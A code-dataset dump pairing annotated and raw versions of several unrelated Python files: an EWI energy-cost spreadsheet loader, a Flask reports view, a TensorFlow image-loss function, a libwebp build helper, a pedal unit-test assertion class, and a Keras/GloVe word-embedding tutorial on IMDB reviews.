    and co2 price tables from the "Start" sheet.

    Returns
    -------
    types.SimpleNamespace
        One pandas DataFrame per table, indexed by fuel with columns
        value/unit/source.

    Examples
    --------
    # >>> ewi_data = get_ewi_data()
    # >>> round(ewi_data.fuel_costs.loc["hard coal", "value"], 2)
    # 11.28
    """
    # Download file (cached by tools.download_file if already present).
    url = (
        "https://www.ewi.uni-koeln.de/cms/wp-content/uploads/2019/12"
        "/EWI_Merit_Order_Tool_2019_1_4.xlsm"
    )
    fn = os.path.join(cfg.get("paths", "general"), "ewi.xls")
    tools.download_file(fn, url)

    # Cell ranges of the sub-tables on the "Start" sheet. The optional
    # "scale" entry is NOT a pandas argument; it rescales the parsed values.
    ewi_tables = {
        "fuel_costs": {"skiprows": 7, "usecols": "C:F", "nrows": 7},
        "transport_costs": {"skiprows": 21, "usecols": "C:F", "nrows": 7},
        "variable_costs": {"skiprows": 31, "usecols": "C:F", "nrows": 8},
        "downtime_factor": {
            "skiprows": 31,
            "usecols": "H:K",
            "nrows": 8,
            "scale": 0.01,
        },
        "emission": {"skiprows": 31, "usecols": "M:P", "nrows": 7},
        "co2_price": {"skiprows": 17, "usecols": "C:F", "nrows": 1},
    }

    ewi_data = {}
    cols = ["fuel", "value", "unit", "source"]
    xls = pd.ExcelFile(fn)
    for table, spec in ewi_tables.items():
        # BUGFIX: strip the private "scale" key before forwarding to pandas;
        # ExcelFile.parse raises TypeError on unknown keyword arguments.
        parse_kwargs = {k: v for k, v in spec.items() if k != "scale"}
        tmp = xls.parse("Start", header=[0], **parse_kwargs).replace(
            TRANSLATION_FUEL
        )
        tmp.drop_duplicates(tmp.columns[0], keep="first", inplace=True)
        tmp.columns = cols
        ewi_data[table] = tmp.set_index("fuel")
        if "scale" in spec:
            ewi_data[table]["value"] *= spec["scale"]

    return SimpleNamespace(**ewi_data)
| <filename>src/scenario_builder/data.py
# -*- coding: utf-8 -*-
"""General data processing for general non-reegis data.
SPDX-FileCopyrightText: 2016-2021 <NAME> <<EMAIL>>
SPDX-License-Identifier: MIT
"""
__copyright__ = "<NAME> <<EMAIL>>"
__license__ = "MIT"
import os
from types import SimpleNamespace
import pandas as pd
from reegis import config as cfg
from reegis import tools
TRANSLATION_FUEL = {
"Abfall": "waste",
"Kernenergie": "nuclear",
"Braunkohle": "lignite",
"Steinkohle": "hard coal",
"Erdgas": "natural gas",
"GuD": "natural gas",
"Gasturbine": "natural gas",
"Öl": "oil",
"Sonstige": "other",
"Emissionszertifikatspreis": "co2_price",
}
def get_ewi_data():
"""
Returns
-------
namedtuple
TODO: Keep this in deflex???
Examples
--------
# >>> ewi_data = get_ewi_data()
# >>> round(ewi_data.fuel_costs.loc["hard coal", "value"], 2)
# 11.28
"""
# Download file
url = (
"https://www.ewi.uni-koeln.de/cms/wp-content/uploads/2019/12"
"/EWI_Merit_Order_Tool_2019_1_4.xlsm"
)
fn = os.path.join(cfg.get("paths", "general"), "ewi.xls")
tools.download_file(fn, url)
# Create named tuple with all sub tables
ewi_tables = {
"fuel_costs": {"skiprows": 7, "usecols": "C:F", "nrows": 7},
"transport_costs": {"skiprows": 21, "usecols": "C:F", "nrows": 7},
"variable_costs": {"skiprows": 31, "usecols": "C:F", "nrows": 8},
"downtime_factor": {
"skiprows": 31,
"usecols": "H:K",
"nrows": 8,
"scale": 0.01,
},
"emission": {"skiprows": 31, "usecols": "M:P", "nrows": 7},
"co2_price": {"skiprows": 17, "usecols": "C:F", "nrows": 1},
}
ewi_data = {}
cols = ["fuel", "value", "unit", "source"]
xls = pd.ExcelFile(fn)
for table in ewi_tables.keys():
tmp = xls.parse("Start", header=[0], **ewi_tables[table]).replace(
TRANSLATION_FUEL
)
tmp.drop_duplicates(tmp.columns[0], keep="first", inplace=True)
tmp.columns = cols
ewi_data[table] = tmp.set_index("fuel")
if "scale" in ewi_tables[table]:
ewi_data[table]["value"] *= ewi_tables[table]["scale"]
return SimpleNamespace(**ewi_data)
| en | 0.453777 | # -*- coding: utf-8 -*- General data processing for general non-reegis data. SPDX-FileCopyrightText: 2016-2021 <NAME> <<EMAIL>> SPDX-License-Identifier: MIT Returns ------- namedtuple TODO: Keep this in deflex??? Examples -------- # >>> ewi_data = get_ewi_data() # >>> round(ewi_data.fuel_costs.loc["hard coal", "value"], 2) # 11.28 # Download file # Create named tuple with all sub tables | 2.035671 | 2 |
application/reports/views.py | riihikallio/tsoha | 0 | 6612390 | <reponame>riihikallio/tsoha
from flask import render_template
from flask_login import login_required
from application import app
from application.reports.models import sales_by_category, sales_by_customer
@app.route("/reports/", methods=["GET"])
@login_required
def reports():
    """Render the sales reports page; requires an authenticated user."""
    category_sales = sales_by_category()
    customer_sales = sales_by_customer()
    return render_template("reports/show.html", cat=category_sales, cust=customer_sales)
| from flask import render_template
from flask_login import login_required
from application import app
from application.reports.models import sales_by_category, sales_by_customer
@app.route("/reports/", methods=["GET"])
@login_required
def reports():
return render_template("reports/show.html", cat=sales_by_category(), cust=sales_by_customer()) | none | 1 | 2.056988 | 2 | |
segme/loss/fb_exclusion.py | shkarupa-alex/segme | 2 | 6612391 | <gh_stars>1-10
import tensorflow as tf
from keras.utils.generic_utils import register_keras_serializable
from keras.utils.losses_utils import ReductionV2 as Reduction
from .weighted_wrapper import WeightedLossFunctionWrapper
@register_keras_serializable(package='SegMe')
class ForegroundBackgroundExclusionLoss(WeightedLossFunctionWrapper):
    """ Gradient-exclusion loss between foreground and background predictions.

    Proposed in: 'Single Image Reflection Removal with Perceptual Losses'
    Implements Equation [5] in https://arxiv.org/pdf/1806.05376.pdf

    Arguments:
        levels: number of average-pooled pyramid levels the loss is
            evaluated on (2x downsampling per level).
        reduction: Keras loss reduction mode.
        name: name for the loss instance.
    """
    def __init__(
            self, levels=3, reduction=Reduction.AUTO, name='foreground_background_exclusion_loss'):
        super().__init__(foreground_background_exclusion_loss, reduction=reduction, name=name, levels=levels)
def _foreground_background_exclusion_level(f_pred, b_pred, axis, sample_weight):
    """Exclusion term for one pyramid level along one spatial axis.

    Computes finite-difference gradients of foreground and background
    predictions along ``axis`` (1 = height, 2 = width), normalizes them,
    and penalizes locations where both have strong gradients.
    Inputs are assumed to be rank-4 NHWC tensors (enforced by the caller).
    """
    grad_w = None
    if 1 == axis:
        # Vertical finite differences (along the height axis).
        grad_f = f_pred[:, 1:, :, :] - f_pred[:, :-1, :, :]
        grad_b = b_pred[:, 1:, :, :] - b_pred[:, :-1, :, :]
        if sample_weight is not None:
            # Weight of a gradient location is the minimum of the two
            # pixel weights it spans.
            grad_w = tf.reduce_min(tf.concat([
                sample_weight[:, 1:, :, :], sample_weight[:, :-1, :, :]
            ], axis=-1), axis=-1, keepdims=True)
    elif 2 == axis:
        # Horizontal finite differences (along the width axis).
        grad_f = f_pred[:, :, 1:, :] - f_pred[:, :, :-1, :]
        grad_b = b_pred[:, :, 1:, :] - b_pred[:, :, :-1, :]
        if sample_weight is not None:
            grad_w = tf.reduce_min(tf.concat([
                sample_weight[:, :, 1:, :], sample_weight[:, :, :-1, :]
            ], axis=-1), axis=-1, keepdims=True)
    else:
        raise ValueError('Unsupported axis: {}'.format(axis))

    # All non-batch axes (H, W, C).
    axis_hwc = list(range(1, f_pred.shape.ndims))
    # Scale factor balancing the magnitudes of the two gradient fields
    # (lambda_B in Eq. [5]); divide_no_nan guards flat backgrounds.
    alpha = 2. * tf.math.divide_no_nan(
        tf.reduce_mean(tf.abs(grad_f), axis=axis_hwc, keepdims=True),
        tf.reduce_mean(tf.abs(grad_b), axis=axis_hwc, keepdims=True))
    # Map gradients into (-1, 1) via a shifted sigmoid (tanh-like).
    grad_fs = tf.nn.sigmoid(grad_f) * 2. - 1.
    grad_bs = tf.nn.sigmoid(grad_b * alpha) * 2. - 1.
    # Penalize co-occurring gradients in both predictions.
    loss = tf.multiply(grad_fs ** 2, grad_bs ** 2)
    if grad_w is not None:
        loss *= grad_w
    loss = tf.reduce_mean(loss, axis=axis_hwc) ** 0.25
    return loss
def foreground_background_exclusion_loss(f_pred, b_pred, sample_weight, levels):
    """Multi-level foreground/background gradient exclusion loss.

    Evaluates the per-axis exclusion term on an average-pooled pyramid of
    ``levels`` scales and averages the results. ``f_pred`` and ``b_pred``
    must be rank-4 NHWC tensors; ``sample_weight`` (optional) is pooled
    alongside the predictions.
    """
    assert_f_rank = tf.assert_rank(f_pred, 4)
    assert_b_rank = tf.assert_rank(b_pred, 4)
    with tf.control_dependencies([assert_f_rank, assert_b_rank]):
        f_pred = tf.convert_to_tensor(f_pred)
        b_pred = tf.cast(b_pred, dtype=f_pred.dtype)

        loss = []
        for level in range(levels):
            if level > 0:
                # Downsample everything by 2x for each additional level.
                f_pred = tf.nn.avg_pool(f_pred, [1, 2, 2, 1], [1, 2, 2, 1], padding='SAME')
                b_pred = tf.nn.avg_pool(b_pred, [1, 2, 2, 1], [1, 2, 2, 1], padding='SAME')
                if sample_weight is not None:
                    sample_weight = tf.nn.avg_pool(sample_weight, [1, 2, 2, 1], [1, 2, 2, 1], padding='SAME')
            # One term per spatial axis (height and width).
            loss.append(_foreground_background_exclusion_level(f_pred, b_pred, axis=1, sample_weight=sample_weight))
            loss.append(_foreground_background_exclusion_level(f_pred, b_pred, axis=2, sample_weight=sample_weight))

        # Average over 2 axes x `levels` scales.
        loss = sum(loss) / (2. * levels)

        return loss
| import tensorflow as tf
from keras.utils.generic_utils import register_keras_serializable
from keras.utils.losses_utils import ReductionV2 as Reduction
from .weighted_wrapper import WeightedLossFunctionWrapper
@register_keras_serializable(package='SegMe')
class ForegroundBackgroundExclusionLoss(WeightedLossFunctionWrapper):
""" Proposed in: 'Single Image Reflection Removal with Perceptual Losses'
Implements Equation [5] in https://arxiv.org/pdf/1806.05376.pdf
"""
def __init__(
self, levels=3, reduction=Reduction.AUTO, name='foreground_background_exclusion_loss'):
super().__init__(foreground_background_exclusion_loss, reduction=reduction, name=name, levels=levels)
def _foreground_background_exclusion_level(f_pred, b_pred, axis, sample_weight):
grad_w = None
if 1 == axis:
grad_f = f_pred[:, 1:, :, :] - f_pred[:, :-1, :, :]
grad_b = b_pred[:, 1:, :, :] - b_pred[:, :-1, :, :]
if sample_weight is not None:
grad_w = tf.reduce_min(tf.concat([
sample_weight[:, 1:, :, :], sample_weight[:, :-1, :, :]
], axis=-1), axis=-1, keepdims=True)
elif 2 == axis:
grad_f = f_pred[:, :, 1:, :] - f_pred[:, :, :-1, :]
grad_b = b_pred[:, :, 1:, :] - b_pred[:, :, :-1, :]
if sample_weight is not None:
grad_w = tf.reduce_min(tf.concat([
sample_weight[:, :, 1:, :], sample_weight[:, :, :-1, :]
], axis=-1), axis=-1, keepdims=True)
else:
raise ValueError('Unsupported axis: {}'.format(axis))
axis_hwc = list(range(1, f_pred.shape.ndims))
alpha = 2. * tf.math.divide_no_nan(
tf.reduce_mean(tf.abs(grad_f), axis=axis_hwc, keepdims=True),
tf.reduce_mean(tf.abs(grad_b), axis=axis_hwc, keepdims=True))
grad_fs = tf.nn.sigmoid(grad_f) * 2. - 1.
grad_bs = tf.nn.sigmoid(grad_b * alpha) * 2. - 1.
loss = tf.multiply(grad_fs ** 2, grad_bs ** 2)
if grad_w is not None:
loss *= grad_w
loss = tf.reduce_mean(loss, axis=axis_hwc) ** 0.25
return loss
def foreground_background_exclusion_loss(f_pred, b_pred, sample_weight, levels):
assert_f_rank = tf.assert_rank(f_pred, 4)
assert_b_rank = tf.assert_rank(b_pred, 4)
with tf.control_dependencies([assert_f_rank, assert_b_rank]):
f_pred = tf.convert_to_tensor(f_pred)
b_pred = tf.cast(b_pred, dtype=f_pred.dtype)
loss = []
for level in range(levels):
if level > 0:
f_pred = tf.nn.avg_pool(f_pred, [1, 2, 2, 1], [1, 2, 2, 1], padding='SAME')
b_pred = tf.nn.avg_pool(b_pred, [1, 2, 2, 1], [1, 2, 2, 1], padding='SAME')
if sample_weight is not None:
sample_weight = tf.nn.avg_pool(sample_weight, [1, 2, 2, 1], [1, 2, 2, 1], padding='SAME')
loss.append(_foreground_background_exclusion_level(f_pred, b_pred, axis=1, sample_weight=sample_weight))
loss.append(_foreground_background_exclusion_level(f_pred, b_pred, axis=2, sample_weight=sample_weight))
loss = sum(loss) / (2. * levels)
return loss | en | 0.746804 | Proposed in: 'Single Image Reflection Removal with Perceptual Losses' Implements Equation [5] in https://arxiv.org/pdf/1806.05376.pdf | 2.104078 | 2 |
builder/build_libwebp/__init__.py | kdschlosser/wxAnimation | 2 | 6612392 | <filename>builder/build_libwebp/__init__.py
# -*- coding: utf-8 -*-
import os
from .. import build_clib
from ..dep_versions import WEBP_VERSION
from setuptools import Extension as _Extension
# Base URL of the official libwebp release archive.
URL = 'https://storage.googleapis.com/downloads.webmproject.org/releases/webp'
# Format string; filled with VERSION to build the tarball URL.
DOWNLOAD_URL = URL + '/libwebp-{0}.tar.gz'
VERSION = WEBP_VERSION
# I know this seems kind of odd... I am doing a tiny bit of voodoo magic code here
# I need the class name in order to set up the directories
# and i use the __module__ attribute of the class in order to get this module instance
# from sys.modules. I use that module instance to grab the 3 constants in this file.
class build_libwebp(build_clib.build_clib):
    # Intentionally empty: the base class locates this module through the
    # subclass's __module__ attribute and reads URL/DOWNLOAD_URL/VERSION
    # from it (see the module-level comment above).
    pass
class WebpExtension(_Extension):
    """setuptools Extension preconfigured for the bundled libwebp wrapper."""

    def __init__(self, *args, **kwargs):
        _Extension.__init__(self, *args, **kwargs)
        here = os.path.dirname(__file__)
        # Fixed extension identity and wrapper sources, regardless of the
        # arguments forwarded to the base class.
        self.name = '_libwebp'
        self.sources = [os.path.join(here, 'extension.c')]
        self.header = os.path.join(here, 'extension.h')
        self.extra_objects = [
            'webpmux.lib',
            'webpdemux.lib',
            'webpdecoder.lib',
            'webp.lib',
        ]
        # Header search paths inside the unpacked libwebp source tree.
        subdirs = ('dec', 'demux', 'dsp', 'enc', 'mux', 'utils', 'webp')
        self.include_dirs = ['webp/src/' + sub for sub in subdirs]
        self.libraries = []
| <filename>builder/build_libwebp/__init__.py
# -*- coding: utf-8 -*-
import os
from .. import build_clib
from ..dep_versions import WEBP_VERSION
from setuptools import Extension as _Extension
URL = 'https://storage.googleapis.com/downloads.webmproject.org/releases/webp'
DOWNLOAD_URL = URL + '/libwebp-{0}.tar.gz'
VERSION = WEBP_VERSION
# I know this seems kind of odd... I am doing a tiny bit of voodoo magic code here
# I need the class name in order to set up the directories
# and i use the __module__ attribute of the class in order to get this module instance
# from sys.modules. I use that module instance to grab the 3 constants in this file.
class build_libwebp(build_clib.build_clib):
pass
class WebpExtension(_Extension):
def __init__(self, *args, **kwargs):
_Extension.__init__(self, *args, **kwargs)
self.name = '_libwebp'
self.sources = [os.path.join(os.path.dirname(__file__), 'extension.c')]
self.header = os.path.join(os.path.dirname(__file__), 'extension.h')
self.extra_objects = ['webpmux.lib', 'webpdemux.lib', 'webpdecoder.lib', 'webp.lib']
self.include_dirs = [
'webp/src/dec',
'webp/src/demux',
'webp/src/dsp',
'webp/src/enc',
'webp/src/mux',
'webp/src/utils',
'webp/src/webp'
]
self.libraries = []
| en | 0.817314 | # -*- coding: utf-8 -*- # I know this seems kind of odd... I am doing a tiny bit of voodoo magic code here # I need the class name in order to set up the directories # and i use the __module__ attribute of the class in order to get this module instance # from sys.modules. I use that module instance to grab the 3 constants in this file. | 2.028575 | 2 |
src/lib/pedal/plugins/vpl_unittest.py | Skydler/skulpt | 4 | 6612393 | <reponame>Skydler/skulpt<filename>src/lib/pedal/plugins/vpl_unittest.py<gh_stars>1-10
from unittest.util import safe_repr
from pedal import gently
from pedal.assertions.assertions import _normalize_string
class UnitTestedAssignment:
    """Base class for instructor-written unit tests graded through pedal.

    Subclasses define ``test_*`` methods built from the ``assert*`` helpers
    below. A failed assertion raises :class:`AssertionException`, which
    ``_run_all_tests`` converts into gentle student feedback.
    """
    # Tolerance used for approximate numeric comparisons.
    DELTA = .001

    class AssertionException(Exception):
        """Raised when an assertion fails; carries the feedback message."""
        def __init__(self, message):
            self.message = message

    def __init__(self):
        pass

    def setUp(self):
        """Hook executed before each test method; override in subclasses."""
        pass

    def tearDown(self):
        """Hook executed after each test method; override in subclasses."""
        pass

    def _run_all_tests(self):
        """Run every ``test_*`` method, reporting failures via ``gently``.

        Returns True if all tests passed, False otherwise.
        """
        methods = [func for func in dir(self)
                   if callable(getattr(self, func)) and
                   func.startswith('test_')]
        all_passed = True
        for method in methods:
            self.setUp()
            try:
                getattr(self, method)()
            except UnitTestedAssignment.AssertionException as e:
                gently(e.message)
                all_passed = False
            self.tearDown()
        return all_passed

    def assertSimilarStrings(self, first, second, msg):
        """Fail unless the two strings are equal after normalization."""
        if _normalize_string(first) != _normalize_string(second):
            standardMsg = "{} != {}".format(safe_repr(first), safe_repr(second))
            self.fail(msg, standardMsg)

    def assertNotSimilarStrings(self, first, second, msg):
        """Fail if the two strings are equal after normalization.

        BUGFIX: this previously delegated to assertEqual, which returned
        silently when the strings were exactly equal, so
        ``assertNotEqual("a", "a")`` never failed.
        """
        if _normalize_string(first) == _normalize_string(second):
            standardMsg = "{} == {}".format(safe_repr(first), safe_repr(second))
            self.fail(msg, standardMsg)

    def assertLessEqual(self, val1, val2, msg=None):
        if not (val1 <= val2):
            self.fail(msg, "{} is not less than or equal to {}".format(safe_repr(val1), safe_repr(val2)))

    def assertGreaterEqual(self, val1, val2, msg=None):
        if not (val1 >= val2):
            self.fail(msg, "{} is not greater than or equal to {}".format(safe_repr(val1), safe_repr(val2)))

    def assertNotEqual(self, val1, val2, msg=None, exact=False):
        """Fail when the values are (fuzzily, unless exact) equal."""
        if not exact and isinstance(val1, str) and isinstance(val2, str):
            # Strings: fail whenever they match after normalization. This
            # also covers the exactly-equal case that was silently passed
            # before (the old numeric-tolerance branch was unreachable).
            return self.assertNotSimilarStrings(val1, val2, msg)
        if val1 != val2:
            return
        standardMsg = "{} == {}".format(safe_repr(val1), safe_repr(val2))
        self.fail(msg, standardMsg)

    def assertEqual(self, val1, val2, msg=None, exact=False):
        """Fail unless the values are (fuzzily, unless exact) equal."""
        if val1 == val2:
            return
        if not exact and isinstance(val1, str) and isinstance(val2, str):
            # BUGFIX: return after delegating; previously execution fell
            # through and failed even when the strings were similar.
            return self.assertSimilarStrings(val1, val2, msg)
        if (not exact and isinstance(val1, (int, float)) and
                isinstance(val2, (int, float))):
            if abs(val2 - val1) <= UnitTestedAssignment.DELTA:
                return
        standardMsg = "{} != {}".format(safe_repr(val1), safe_repr(val2))
        self.fail(msg, standardMsg)

    def assertIn(self, member, container, msg=None):
        if member not in container:
            standardMsg = "{} not found in {}".format(safe_repr(member),
                                                      safe_repr(container))
            self.fail(msg, standardMsg)

    def assertNotIn(self, member, container, msg=None):
        if member in container:
            standardMsg = "{} found in {}".format(safe_repr(member),
                                                  safe_repr(container))
            self.fail(msg, standardMsg)

    def assertTrue(self, value, msg=None):
        if not value:
            self.fail(msg, "{} is not true".format(value))

    def assertFalse(self, value, msg=None):
        if value:
            self.fail(msg, "{} is not false".format(value))

    def assertSandbox(self, sandbox, msg=None):
        """Fail if the sandboxed student execution raised an exception."""
        if sandbox.exception is not None:
            self.fail(msg, sandbox.format_exception())

    def assertIsInstance(self, value, parent, msg=None):
        if not isinstance(value, parent):
            self.fail(msg, "{} is not an instance of {}".format(safe_repr(value), safe_repr(parent)))

    def assertHasAttr(self, object, attr, msg=None):
        if not hasattr(object, attr):
            self.fail(msg, "{} does not have an attribute named {}".format(safe_repr(object), safe_repr(attr)))

    def fail(self, message, standardMsg):
        """Raise AssertionException with `message`, falling back to `standardMsg`."""
        if message is None:
            message = standardMsg
        raise UnitTestedAssignment.AssertionException(message)
| from unittest.util import safe_repr
from pedal import gently
from pedal.assertions.assertions import _normalize_string
class UnitTestedAssignment:
DELTA = .001
class AssertionException(Exception):
def __init__(self, message):
self.message = message
def __init__(self):
pass
def setUp(self):
pass
def tearDown(self):
pass
def _run_all_tests(self):
methods = [func for func in dir(self)
if callable(getattr(self, func)) and
func.startswith('test_')]
all_passed = True
for method in methods:
self.setUp()
try:
getattr(self, method)()
except UnitTestedAssignment.AssertionException as e:
gently(e.message)
all_passed = False
self.tearDown()
return all_passed
def assertSimilarStrings(self, first, second, msg):
if _normalize_string(first) != _normalize_string(second):
return self.assertEqual(first, second, msg, exact=True)
def assertNotSimilarStrings(self, first, second, msg):
if _normalize_string(first) == _normalize_string(second):
return self.assertEqual(first, second, msg, exact=True)
def assertLessEqual(self, val1, val2, msg=None):
if not (val1 <= val2):
self.fail(msg, "{} is not less than or equal to {}".format(safe_repr(val1), safe_repr(val2)))
def assertGreaterEqual(self, val1, val2, msg=None):
if not (val1 >= val2):
self.fail(msg, "{} is not greater than or equal to {}".format(safe_repr(val1), safe_repr(val2)))
def assertNotEqual(self, val1, val2, msg=None, exact=False):
if val1 != val2:
return
if not exact and isinstance(val1, str) and isinstance(val2, str):
self.assertNotSimilarStrings(val1, val2, msg)
elif (not exact and isinstance(val1, (int, float)) and
isinstance(val2, (int, float))):
if abs(val2 - val1) > UnitTestedAssignment.DELTA:
return
standardMsg = "{} == {}".format(safe_repr(val1), safe_repr(val2))
self.fail(msg, standardMsg)
def assertEqual(self, val1, val2, msg=None, exact=False):
if val1 == val2:
return
if not exact and isinstance(val1, str) and isinstance(val2, str):
self.assertSimilarStrings(val1, val2, msg)
elif (not exact and isinstance(val1, (int, float)) and
isinstance(val2, (int, float))):
if abs(val2 - val1) <= UnitTestedAssignment.DELTA:
return
standardMsg = "{} != {}".format(safe_repr(val1), safe_repr(val2))
self.fail(msg, standardMsg)
def assertIn(self, member, container, msg=None):
if member not in container:
standardMsg = "{} not found in {}".format(safe_repr(member),
safe_repr(container))
self.fail(msg, standardMsg)
def assertNotIn(self, member, container, msg=None):
if member in container:
standardMsg = "{} found in {}".format(safe_repr(member),
safe_repr(container))
self.fail(msg, standardMsg)
def assertTrue(self, value, msg=None):
if not value:
self.fail(msg, "{} is not true".format(value))
def assertFalse(self, value, msg=None):
if value:
self.fail(msg, "{} is not false".format(value))
def assertSandbox(self, sandbox, msg=None):
if sandbox.exception is not None:
self.fail(msg, sandbox.format_exception())
def assertIsInstance(self, value, parent, msg=None):
if not isinstance(value, parent):
self.fail(msg, "{} is not an instance of {}".format(safe_repr(value), safe_repr(parent)))
def assertHasAttr(self, object, attr, msg=None):
if not hasattr(object, attr):
self.fail(msg, "{} does not have an attribute named {}".format(safe_repr(object), safe_repr(attr)))
def fail(self, message, standardMsg):
if message is None:
message = standardMsg
raise UnitTestedAssignment.AssertionException(message) | none | 1 | 2.932735 | 3 | |
lec6-2[w2v].py | cutz-j/keras | 0 | 6612394 | ### w2v ###
import numpy as np
from keras.datasets import imdb
from keras import preprocessing
from keras.models import Sequential
from keras.layers import Flatten, Dense, Embedding
import os
from keras.preprocessing.text import Tokenizer # token
from keras.preprocessing.sequence import pad_sequences # array화
import tensorflow as tf
max_features = 1000  # keep only the 1000 most frequent words
maxlen = 20  # number of words kept per review
# data download #
(x_train, y_train), (x_test, y_test) = imdb.load_data(num_words=max_features)  # movie review data --> word index arrays
# truncate/pad every review to 20 tokens #
x_train = preprocessing.sequence.pad_sequences(x_train, maxlen=maxlen)  # shape=(25000,20)
x_test = preprocessing.sequence.pad_sequences(x_test, maxlen=maxlen)  # (25000, 20)
## embedding layer ##
model = Sequential()
model.add(Embedding(input_dim=10000, output_dim=8, input_length=maxlen))
model.add(Flatten())
model.add(Dense(1, activation='sigmoid'))
model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['acc'])
model.summary()
history = model.fit(x_train, y_train,
                    epochs=10, batch_size=32, validation_split=0.2)
model.summary()
### pretrained embedding model ###
imdb_dir = 'd:/data/datasets/aclImdb'
train_dir = os.path.join(imdb_dir, 'train')
labels = []  # 25000 labels (pos / neg)
texts = []  # 25000 raw review texts
## load the reviews of each label directory ##
for label_type in ['neg', 'pos']:
    dir_name = os.path.join(train_dir, label_type)
    for fname in os.listdir(dir_name):
        if fname[-4:] == '.txt':
            # FIX: context manager ensures the file handle is closed even
            # if reading raises (original leaked handles on error).
            with open(os.path.join(dir_name, fname), encoding="utf-8") as f:
                texts.append(f.read())
            if label_type == 'neg':
                labels.append(0)
            else:
                labels.append(1)
maxlen = 100  # maximum number of words kept per review
training_samples = 15000
validation_samples = 10000
max_words = 10000  # vocabulary size used from the dataset
tokenizer = Tokenizer(num_words=max_words)
tokenizer.fit_on_texts(texts)
sequences = tokenizer.texts_to_sequences(texts)
word_index = tokenizer.word_index
data = pad_sequences(sequences, maxlen=maxlen)
labels = np.asarray(labels)
# reproducible joint shuffle of samples and labels
np.random.seed(7)
indices = np.arange(data.shape[0])
np.random.shuffle(indices)
data = data[indices]
labels = labels[indices]
x_train = data[:training_samples]
y_train = labels[:training_samples]
x_val = data[training_samples: training_samples + validation_samples]
y_val = labels[training_samples: training_samples + validation_samples]
## pretrained: GloVe ##
glove_dir = 'd:/data/datasets/'
embeddings_index = {}
# FIX: context manager so the GloVe file is always closed (original used
# open/close and leaked the handle on parse errors).
with open(os.path.join(glove_dir, 'glove.6B.100d.txt'), encoding='utf8') as f:
    for line in f:
        values = line.split()
        word = values[0]
        coefs = np.asarray(values[1:], dtype='float32')
        embeddings_index[word] = coefs
# embedding matrix: row i holds the GloVe vector for word index i #
embedding_dim = 100
embedding_matrix = np.zeros((max_words, embedding_dim))
for word, i in word_index.items():
    if i < max_words:
        embedding_vector = embeddings_index.get(word)
        if embedding_vector is not None:
            embedding_matrix[i] = embedding_vector
model = Sequential()
model.add(Embedding(max_words, embedding_dim, input_length=maxlen))
model.add(Flatten())
model.add(Dense(32, activation='relu'))
model.add(Dense(1, activation='sigmoid'))
model.summary()
# load the pretrained weights and freeze the embedding layer #
model.layers[0].set_weights([embedding_matrix])
model.layers[0].trainable = False
model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['acc'])
history = model.fit(x_train, y_train, epochs=10, batch_size=32, validation_data=(x_val, y_val))
## tensorflow embedding (TF1-style graph) ##
y_train = y_train.reshape(-1, 1)
y_val = y_val.reshape(-1, 1)
X = tf.placeholder(dtype=tf.float32, shape=[None, 100])
y = tf.placeholder(dtype=tf.float32, shape=[None, 1])
W1 = tf.Variable(tf.random_uniform(shape=[100, 10000], dtype=tf.float32, seed=7))
b1 = tf.Variable(tf.random_uniform(shape=[10000], dtype=tf.float32, seed=7))
flatten = tf.layers.flatten(tf.matmul(X, W1) + b1)
W2 = tf.Variable(tf.random_uniform(shape=[10000, 1], dtype=tf.float32, seed=7))
b2 = tf.Variable(tf.random_uniform(shape=[1], dtype=tf.float32, seed=7))
# BUGFIX: sigmoid_cross_entropy_with_logits expects RAW logits; the
# original applied tf.sigmoid first, i.e. a double sigmoid in the loss.
logits = tf.matmul(flatten, W2) + b2
probs = tf.sigmoid(logits)
cost = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=logits, labels=y))
train = tf.train.AdamOptimizer(0.1).minimize(cost)
correct = tf.cast(probs > 0.5, dtype=tf.float32)
accuracy = tf.reduce_mean(tf.cast(tf.equal(y, correct), dtype=tf.float32))
with tf.Session() as sess:
    sess.run(tf.global_variables_initializer())
    dataset = tf.data.Dataset.from_tensor_slices((X, y))
    dataset = dataset.repeat().batch(32)
    iterator = dataset.make_initializable_iterator()
    next_element = iterator.get_next()
    sess.run(iterator.initializer, feed_dict={X: x_train, y: y_train})
    # train #
    for epoch in range(50):
        total_batch = int(x_train.shape[0] / 32)
        train_cost = 0
        for i in range(total_batch):  # one full pass over the batches
            x_batch, y_batch = sess.run(next_element)
            cost_val, _ = sess.run([cost, train], feed_dict={X: x_batch, y: y_batch})
            train_cost += cost_val / total_batch
        print("cost: ", train_cost)
    acc, cor, y_hat = sess.run([accuracy, correct, probs],
                               feed_dict={X: x_val, y: y_val})
    print(acc)
| ### w2v ###
import numpy as np
from keras.datasets import imdb
from keras import preprocessing
from keras.models import Sequential
from keras.layers import Flatten, Dense, Embedding
import os
from keras.preprocessing.text import Tokenizer  # word -> integer-index tokenizer
from keras.preprocessing.sequence import pad_sequences  # pad/truncate sequences to fixed-length arrays
import tensorflow as tf
max_features = 1000  # keep only the 1000 most frequent words
maxlen = 20  # number of word indices kept per review
# Download the IMDB movie-review dataset as word-index sequences. #
(x_train, y_train), (x_test, y_test) = imdb.load_data(num_words=max_features)  # movie review data --> word index arrays
# Truncate/pad every review to maxlen indices. #
x_train = preprocessing.sequence.pad_sequences(x_train, maxlen=maxlen)  # shape=(25000,20)
x_test = preprocessing.sequence.pad_sequences(x_test, maxlen=maxlen)  # (25000, 20)
## Model 1: embedding layer trained from scratch ##
model = Sequential()
# NOTE(review): input_dim=10000 but the data was loaded with num_words=1000,
# so indices never exceed 999; this works but over-allocates -- confirm intent.
model.add(Embedding(input_dim=10000, output_dim=8, input_length=maxlen))
model.add(Flatten())
model.add(Dense(1, activation='sigmoid'))
model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['acc'])
model.summary()
history = model.fit(x_train, y_train,
                    epochs=10, batch_size=32, validation_split=0.2)
model.summary()
### Model 2: pretrained embedding (GloVe) ###
imdb_dir = 'd:/data/datasets/aclImdb'
train_dir = os.path.join(imdb_dir, 'train')
labels = []  # 25000 labels (pos / neg)
texts = []  # 25000 raw review texts
## Load the raw text files, one directory per label ##
for label_type in ['neg', 'pos']:
    dir_name = os.path.join(train_dir, label_type)
    for fname in os.listdir(dir_name):
        if fname[-4:] == '.txt':
            f = open(os.path.join(dir_name, fname), encoding="utf-8")
            texts.append(f.read())
            f.close()
            if label_type == 'neg':
                labels.append(0)
            else:
                labels.append(1)
maxlen = 100  # maximum number of words kept per review
training_samples = 15000
validation_samples = 10000
max_words = 10000  # vocabulary size used from the dataset
